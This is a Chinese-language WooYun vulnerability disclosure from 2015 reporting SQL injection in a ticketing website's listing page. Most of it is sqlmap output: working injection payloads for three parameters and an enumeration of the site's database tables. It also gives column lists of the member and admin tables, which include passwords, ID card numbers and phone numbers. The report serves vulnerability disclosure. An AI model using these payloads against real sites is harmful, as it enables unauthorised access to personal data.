当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151936

漏洞标题: 中国票务中心多个参数存在SQL注入(可获取20万用户信息+大量记录信息)

相关厂商:中国票务中心

漏洞作者: 路人甲

提交时间:2015-11-05 09:46

修复时间:2015-12-20 09:48

公开时间:2015-12-20 09:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

搜索了,没有提交重复吧!~~~

详细说明:

首先,地址是

http://www.51piao.com/Ticket/TicketList.aspx?
cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=


多个参数存在注入,cityid,ticketaddrid,name

http://www.51piao.com/Ticket/TicketList.aspx?
cityid=157'&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=


测试返回结果

1.jpg


“/”应用程序中的服务器错误。
第 1 行: ') And (TicketTypeId=' 附近有语法错误。 字符串 ') And TicketTypeId<>31 order by [BeginDate] asc' 之前有未闭合的引号。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 
异常详细信息: System.Exception: 第 1 行: ') And (TicketTypeId=' 附近有语法错误。 字符串 ') And TicketTypeId<>31 order by 
[BeginDate] asc' 之前有未闭合的引号。


这样应该是有注入了吧!~~~

2.jpg


3.jpg


sqlmap identified the following injection points with a total of 509 HTTP(s) req
uests:
---
Place: GET
Parameter: cityid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cityid=157) AND 6477=6477 AND (9107=9107&ticketaddrid=&tickettypeid
=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cityid=157) AND 6063=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(1
19)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6063=6063) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))) AND (1862=1862&tick
etaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&pr
ice2=&day1=&day2=
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: cityid=-1157) UNION ALL SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(1
09)+CHAR(113)+CHAR(87)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(88)+CHAR(106)+CHAR(79)+C
HAR(119)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113)-- &
ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1
=&price2=&day1=&day2=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cityid=157); WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&t
icketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cityid=157) WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&ti
cketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
Place: GET
Parameter: name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&na
me=%' AND 4525=4525 AND '%'='&style=&sort=3&price1=&price2=&day1=&day2=
Place: GET
Parameter: ticketaddrid
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: cityid=157&ticketaddrid=(SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(
109)+CHAR(113)+(SELECT (CASE WHEN (7962=7962) THEN CHAR(49) ELSE CHAR(48) END))+
CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))&tickettypeid=2&ticketdays=&ti
cketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: cityid, type: Unescaped numeric (default)
[1] place: GET, parameter: ticketaddrid, type: Unescaped numeric
[2] place: GET, parameter: name, type: Single quoted string
[q] Quit
> 0
[23:39:41] [INFO] testing Microsoft SQL Server
[23:39:41] [INFO] confirming Microsoft SQL Server
[23:39:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Database: www_51piao_com
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.OrderLog            | 960530  |
| dbo.TicketPrice         | 370802  |
| dbo.vMemberAll          | 341320  |
| dbo.vTicketPrice        | 248386  |
| dbo.MemberAddrBook      | 205920  |
| dbo.Member              | 198769  |
| dbo.vMember             | 198769  |
| dbo.OrderMain           | 179354  |
| dbo.OprLog              | 178047  |
| dbo.vEmailAll           | 130008  |
| dbo.MemberPointLog      | 126478  |
| dbo.TicketOrderDetail   | 124531  |
| dbo.vTicketOrderStat    | 124531  |
| dbo.vFlightTicketOrder  | 121509  |
| dbo.SmsLog              | 110875  |
| dbo.TicketOrder         | 105987  |
| dbo.vTicketOrder        | 105987  |
| dbo.vMobileTemp         | 98091   |
| dbo.vMoibleAll          | 98091   |
| dbo.vMobileAllOrder     | 98081   |
| dbo.vMemberTemp         | 93102   |
| dbo.MemberMoneyLog      | 81837   |
| dbo.TicketPlay          | 81605   |
| dbo.VTicketPlayMag      | 81559   |
| dbo.FlightLog           | 72994   |
| dbo.TrainNew            | 70195   |
| dbo.vLoginLog           | 58650   |
| dbo.ImagesTicket        | 37724   |
| dbo.monitor             | 36593   |
| dbo.FlightOrderDetail   | 31300   |
| dbo.vFlightOrderDetail  | 21042   |
| dbo.FlightOrder         | 15522   |
| dbo.vFlightOrder        | 15522   |
| dbo.Ticket              | 14240   |
| dbo.vTicket             | 14124   |
| dbo.vTicketDetail       | 14124   |
| dbo.vTicketMag          | 14124   |
| dbo.OrderPayCard        | 13596   |
| dbo.vOrderPayCard       | 13596   |
| dbo.MemberLog           | 11971   |
| dbo.vFlightTicketSend   | 10293   |
| dbo.AccountAll          | 8329    |
| dbo.TicketPreOrder      | 6289    |
| dbo.vTicketAddrUse      | 5215    |
| dbo.FlightLogStat       | 2756    |
| dbo.TicketReview        | 2220    |
| dbo.vTicketReviewList   | 1808    |
| dbo.FlightKM            | 1398    |
| dbo.o_kehu              | 1317    |
| dbo.ImagesCommon        | 860     |
| dbo.WebTop              | 858     |
| dbo.JOYCOMPANY          | 786     |
| dbo.vJoyCompany         | 786     |
| dbo.VJoyCompanyMag      | 786     |
| dbo.LinkInfo            | 780     |
| dbo.CITY                | 647     |
| dbo.AgentInfo           | 526     |
| dbo.VChinaCity          | 455     |
| dbo.NewsHelp            | 431     |
| dbo.vNewsHelp           | 416     |
| dbo.VNewsHelp1          | 416     |
| dbo.PointProductOrder   | 293     |
| dbo.vTicketBig          | 280     |
| dbo.vTicketHomeTop      | 279     |
| dbo.MemberWebUnion      | 210     |
| dbo.vTicketLeft         | 176     |
| dbo.vTicketSmall        | 155     |
| dbo.FlightCityCode      | 152     |
| dbo.FlightSale          | 144     |
| dbo.VFlightSale         | 141     |
| dbo.Area                | 131     |
| dbo.Users               | 116     |
| dbo.vUserMag            | 116     |
| dbo.BlackIp             | 103     |
| dbo.REGION              | 96      |
| dbo.PointProduct        | 84      |
| dbo.TrainTrade          | 65      |
| dbo.vTrainTrade         | 65      |
| dbo.TrainTradeBak       | 60      |
| dbo.NewsHelpModule      | 57      |
| dbo.sysconstraints      | 54      |
| dbo.vPointProduct       | 44      |
| dbo.vPointProduct1      | 44      |
| dbo.TravelLine          | 35      |
| dbo.vTravelLine         | 35      |
| dbo.VTravelLine1        | 35      |
| dbo.vTravelLineDetail   | 35      |
| dbo.Province            | 34      |
| dbo.vMobileAllTrain     | 26      |
| dbo.vTicketTypeCount    | 22      |
| dbo.TempSql             | 17      |
| dbo.vJoyCompanyTop      | 17      |
| dbo.TicketType          | 14      |
| dbo.vTicketType         | 14      |
| dbo.OrderPayMethod      | 12      |
| dbo.FlightSpec          | 11      |
| dbo.vFlightSpec         | 11      |
| dbo.MemberGroup         | 10      |
| dbo.SmsTemplate         | 10      |
| dbo.vSmsTemplate        | 10      |
| dbo.vTemp               | 10      |
| dbo.BaseCreditCard      | 9       |
| dbo.WebModule           | 9       |
| dbo.vWebCity            | 8       |
| dbo.WebCity             | 8       |
| dbo.BlackList           | 7       |
| dbo.SmsEvent            | 7       |
| dbo.BbsBanner           | 6       |
| dbo.Groups              | 6       |
| dbo.OrderFlightTakeAddr | 6       |
| dbo.PointProductType    | 5       |
| dbo.vHomeTicket         | 5       |
| dbo.vSmsModule          | 5       |
| dbo.HotelOrder          | 4       |
| dbo.vHotelOrder         | 4       |
| dbo.syssegments         | 3       |
| dbo.BaseYesNo           | 2       |
| dbo.FlightTicketAddr    | 2       |
| dbo.PriceType           | 2       |
| dbo.CompanySeq          | 1       |
| dbo.FlightSaleTop       | 1       |
| dbo.OrderSeq            | 1       |
| dbo.TravelCompany       | 1       |
+-------------------------+---------+
| dbo.Member              | 198769  |
| dbo.vMember             | 198769  |
| dbo.Users               | 116     |
| dbo.vUserMag            | 116     |
Database: www_51piao_com
Table: Users
[9 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+
Database: www_51piao_com
Table: vUserMag
[10 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| DepartName    |
| ID            |
| IsDisabled    |
| LastLoginTime |
| LEVELID       |
| LoginCount    |
| Password      |
| PurView       |
| UserName      |
+---------------+
Database: www_51piao_com
Table: Member
[43 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+
Database: www_51piao_com
Table: vMember
[45 columns]
+---------------+
| Column        |
+---------------+
| Account       |
| Address       |
| Balance       |
| BirthDay      |
| CardNo        |
| CardType      |
| City          |
| CityId        |
| COMPANYADDR   |
| CompanyId     |
| CompanyName   |
| COMPANYTEL    |
| CompanyType   |
| Degree        |
| Email         |
| FAX           |
| GroupId       |
| GroupName     |
| ID            |
| ISAuditing    |
| IsBindMobile  |
| IsChinese     |
| IsDesignWeb   |
| IsDisabled    |
| IsMailList    |
| IsWeb         |
| LastLoginTime |
| LoginCount    |
| MemberType    |
| MEMO          |
| MOBILE        |
| Name          |
| NickName      |
| openid        |
| POINT         |
| ProvinceId    |
| Pwd           |
| RegDate       |
| SEX           |
| STAFFID       |
| STAFFNAME     |
| TEL           |
| VipMoney      |
| VipNo         |
| ZIPCODE       |
+---------------+


数据挺大的,就不继续了!~~~~

漏洞证明:

如上

修复方案:

过滤修复!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)